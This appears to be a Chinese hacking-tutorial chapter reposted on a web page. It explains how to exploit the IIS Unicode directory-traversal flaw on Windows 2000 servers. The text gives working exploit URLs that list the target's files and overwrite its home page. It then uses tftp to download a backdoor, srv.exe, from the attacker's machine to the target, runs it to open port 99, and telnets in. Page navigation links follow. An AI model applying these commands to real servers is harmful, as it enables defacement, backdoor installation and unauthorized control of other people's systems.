4.2.2 漏洞应用
1.所需工具
流光:小榕开发的功能非常强大的扫描工具。
srv.exe:后门程序,打开目标服务器的99端口。
tftp:是让黑客的电脑变成一台服务器,让被攻击主机来下载黑客本机文件的工具。
2.查找有漏洞的服务器
“流光”在运行中会弹出一个窗口,显示目标服务器存在的漏洞。这时黑客发现有一台服务器存在Unicode漏洞,如图4-18所示。
|
| 图4-18 “流光”探测结果 |
3.远程改写网站首页面
如果黑客在IE的地址栏输入如下命令:
http://*.*.*.5/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ |
结果会显示出目标服务器C盘的所有文件和文件夹,带有<DIR>标记的是目录,如图4-19所示。
代码中的“scripts”是Windows 2000服务器默认IIS目录里的一个可执行文件夹,“../%c1%1c..解析为../..”和“winnt/system32/cmd.exe?”代表调用远程服务器的DOS,“dir%20c:\”是显示C盘根目录文件及目录,其中“%20”解析为空格。
|
| 图4-19 利用Unicode漏洞查看C盘文件 |
|
| 图4-20 利用Unicode漏洞查看系统环境 |
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hack+by+东方飘云+> |
CGI Error |
|
| 图4-21 修改网站首页 |
4.远程拿管理员权限
运行tftp.exe,这时黑客的机器已经是一个FTP服务器了。然后,黑客把要上传的文件复制到与tftp.exe相同的目录下。打开浏览器,在地址栏里键入:
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i *.*.*.1 GET srv.exe c:\\inetpub\\scripts\\srv.exe
其中,“*.*.*.1”为黑客自己的IP,“c:\\inetpub\\scripts\\”为主机服务器目录,“tftp –i”是参数,“GET”是取回命令,后面是取回的文件名。
然后等待大约2~3分钟,IE左下角显示完成。这时srv.exe已经上传到主机的c:\inetpub\scripts\目录下了,如图4-22所示。
键入“http://*.*.*.5/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\ scripts\srv.exe”来执行srv.exe,用于打开目标服务器的99端口,如图4-23所示。
|
| 图4-22 上传srv.exe文件到远程电脑 |
|
| 图4-23 利用Unicode漏洞执行srv.exe文件 |
|
| 图4-24 Telnet到远程电脑 |
| 回书目 上一节 下一节 |
|
· 上周Linux系统命令的使.. · 上周真题冲刺测试获奖.. · 全国计算机等考四级模.. · 08年3月各大网上书店及.. · 网络工程师模拟测试获.. · 全国计算机软考考试指.. |
· 3月24日WCF聊天活动 积.. · 全国计算机等级考试四.. · 软件项目估计:第2版 · 系统分析师基础知识自.. · 构建可扩展的Web站点的.. · 2008年全国计算机等级.. |
|
||||
| · 2008年上半年全国软考.. · 企业数据恢复指南 · 微软出价446亿美元收购.. · Linux——从菜鸟到高手 · 交换机故障解决指南 · OSPF路由协议专栏 · 勇闯IT培训黑色围城 · 见证中国网络安全二十年 |
· 技术人求职简历完备手册 · 华为员工自杀频频拷问.. · 思科全球CEO钱伯斯第七.. · 北漂技术人90天求职纪实 · 2007年互联网大会 · 龙芯要做中国的“奔腾” · IPv6协议--拓展网络无.. · 国际文档格式标准开战 |
|||
|
||||
| · SQL Server 2008/2005.. · SOA 面向服务架构 · SQL Server 2008/2005.. · iSCSI应用与发展 · RAID——磁盘阵列基础 · 中间件应用技术专题 · SQL Server入门到精通 · 国际文档格式标准开战 |
· 路由器设置与口令恢复 · Linux防火墙 · 打造安全服务器 · SOA 面向服务架构 · PHP开发应用手册 · ADSL应用面面俱到 · 入侵防护系统(IPS)初探 · 企业数据恢复指南 |
|||
|
||||
| · iSCSI应用与发展 · 中间件应用技术专题 · SQL Server入门到精通 · SQL Server 2008/2005.. · SOA 面向服务架构 · iSCSI应用与发展 · RAID——磁盘阵列基础 · 企业数据恢复指南 |
· 路由器设置与口令恢复 · SOA 面向服务架构 · 了解统一威胁管理(UTM).. · ADSL应用面面俱到 · ADSL应用面面俱到 · PHP开发应用手册 · 中间件应用技术专题 · 交换机故障解决指南 |
|||